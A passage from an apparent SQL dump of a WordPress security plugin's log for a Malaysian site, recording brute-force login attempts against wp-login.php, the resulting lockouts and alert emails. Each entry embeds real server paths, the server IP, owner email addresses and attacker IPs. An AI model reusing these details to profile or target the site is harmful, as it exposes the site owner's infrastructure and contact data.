Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYA43kXpgmG5P@iB8kNDgAAAJg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"134.209.5.43\";s:11:\"REMOTE_PORT\";s:5:\"41716\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYA43kXpgmG5P@iB8kNDgAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569063139.234\";s:12:\"REQUEST_TIME\";s:10:\"1569063139\";}}','notice','2019-09-21 10:52:20','2019-09-21 10:52:19',17799616,19289168,'https://bintara.com.my/test/wp-login.php',1,0,'134.209.5.43'),(25357,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:51:36','2019-09-21 10:51:35',18088624,19289128,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.72.112.193'),(25358,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYA2liJ7D9Gn7wDPh8U8QAAAME\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.248.161\";s:11:\"REMOTE_PORT\";s:5:\"56964\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYA2liJ7D9Gn7wDPh8U8QAAAME\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063130.4096\";s:12:\"REQUEST_TIME\";s:10:\"1569063130\";}}','notice','2019-09-21 10:52:11','2019-09-21 10:52:10',17799064,19289728,'https://bintara.com.my/2019/wp-login.php',1,0,'45.252.248.161'),(25356,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:51:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:51:35\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:06:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:06:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:51:36','2019-09-21 10:51:35',17882992,19289128,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.72.112.193'),(25354,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:51:28','2019-09-21 10:51:27',18088072,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'134.209.5.43'),(25355,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYAt3kXpgmG5P@iB8kM0wAAAJQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"198.72.112.193\";s:11:\"REMOTE_PORT\";s:5:\"46374\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYAt3kXpgmG5P@iB8kM0wAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063095.1395\";s:12:\"REQUEST_TIME\";s:10:\"1569063095\";}}','notice','2019-09-21 10:51:36','2019-09-21 10:51:35',17798120,19289128,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.72.112.193'),(25353,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:51:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:51:27\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:06:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:06:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:51:28','2019-09-21 10:51:27',17882184,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'134.209.5.43'),(25350,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:51:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:51:06\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:06:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:06:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:51:08','2019-09-21 10:51:06',17972888,19379440,'https://bintara.com.my/blog/wp-login.php',1,0,'185.112.33.202'),(25351,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:51:08','2019-09-21 10:51:06',18178816,19379440,'https://bintara.com.my/blog/wp-login.php',1,0,'185.112.33.202'),(25352,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYAr1iJ7D9Gn7wDPh8U5gAAANA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"134.209.5.43\";s:11:\"REMOTE_PORT\";s:5:\"60080\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYAr1iJ7D9Gn7wDPh8U5gAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063087.1489\";s:12:\"REQUEST_TIME\";s:10:\"1569063087\";}}','notice','2019-09-21 10:51:28','2019-09-21 10:51:27',17797504,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'134.209.5.43'),(25347,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:50:32\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:50:32\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:05:32\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:05:32\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:50:33','2019-09-21 10:50:32',17884240,19289808,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.76.139'),(25348,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:50:33','2019-09-21 10:50:32',18090008,19289808,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.76.139'),(25349,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYAmrfBTP0kPOVnb8jpOgAAAEc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.112.33.202\";s:11:\"REMOTE_PORT\";s:5:\"50396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYAmrfBTP0kPOVnb8jpOgAAAEc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063066.4122\";s:12:\"REQUEST_TIME\";s:10:\"1569063066\";}}','notice','2019-09-21 10:51:08','2019-09-21 10:51:06',17888112,19379440,'https://bintara.com.my/blog/wp-login.php',1,0,'185.112.33.202'),(25345,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:49:52','2019-09-21 10:49:51',18089408,19289672,'https://bintara.com.my/2019/wp-login.php',1,0,'193.34.145.18'),(25346,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYAeFiJ7D9Gn7wDPh8U0AAAANA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.76.139\";s:11:\"REMOTE_PORT\";s:5:\"46734\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYAeFiJ7D9Gn7wDPh8U0AAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063032.0929\";s:12:\"REQUEST_TIME\";s:10:\"1569063032\";}}','notice','2019-09-21 10:50:33','2019-09-21 10:50:32',17799368,19289808,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.76.139'),(25344,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:49:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:49:51\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:04:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:04:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:49:52','2019-09-21 10:49:51',17883528,19289672,'https://bintara.com.my/2019/wp-login.php',1,0,'193.34.145.18'),(25341,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:49:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:49:30\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:04:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:04:30\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:49:31','2019-09-21 10:49:30',17882784,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.12.149.33'),(25342,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:49:31','2019-09-21 10:49:30',18088560,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.12.149.33'),(25343,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 